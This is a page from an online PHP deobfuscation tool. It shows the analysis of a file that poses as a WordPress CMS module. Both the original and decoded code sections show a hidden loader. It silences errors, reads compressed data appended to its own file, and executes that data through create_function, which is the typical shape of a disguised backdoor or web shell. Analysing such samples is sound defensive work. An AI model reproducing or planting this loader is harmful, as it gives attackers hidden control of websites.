Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Description: Wordpress CMS module. * Version: 5.3.0 * Author: Wordpress CM..

Decoded Output download

<?php 
/** 
* Description: Wordpress CMS module. 
* Version: 5.3.0 
* Author: Wordpress CMS 
* Author URI: https://wordpress.org/ 
**/ 
 
error_reporting(0);$handle = fopen(__FILE__, 'r');fseek($handle, 369);$data = stream_get_contents($handle);fclose($handle);$f = create_function('$value', gzuncompress(strrev(substr($data, 32))));$f(substr($data, 0, 32));                ?> 
58ee3bd2cf95651ce3780ed1ad478536@-#xrJ&trE&r4w$RC`.kf"k 
R]rBHsLsSb=s_pP]`I^Ebg;QkZ8!V%[+Bu#RWf!q>zcxv7RN|[4zBPww?s[4$B}~ 
I*me^0K_PUx

Did this file decode correctly?

Original Code

<?php
/**
* Description: Wordpress CMS module.
* Version: 5.3.0
* Author: Wordpress CMS
* Author URI: https://wordpress.org/
**/

error_reporting(0);$handle = fopen(__FILE__, 'r');fseek($handle, 369);$data = stream_get_contents($handle);fclose($handle);$f = create_function('$value', gzuncompress(strrev(substr($data, 32))));$f(substr($data, 0, 32));__halt_compiler();
58ee3bd2cf95651ce3780ed1ad478536@-#xrJ&trE&r4w$RC`.kf"k
R]rBHsLsSb=s_pP]`I^Ebg;QkZ8!V%[+Bu#RWf!q>zcxv7RN|[4zBPww?s[4$B}~
I*me^0K_PUx

Function Calls

fopen 1
fseek 1
error_reporting 1

Variables

$handle True

Stats

MD5 c9f6ddeadaa6ba0c6e24182fafaa75ed
Eval Count 0
Decode Time 89 ms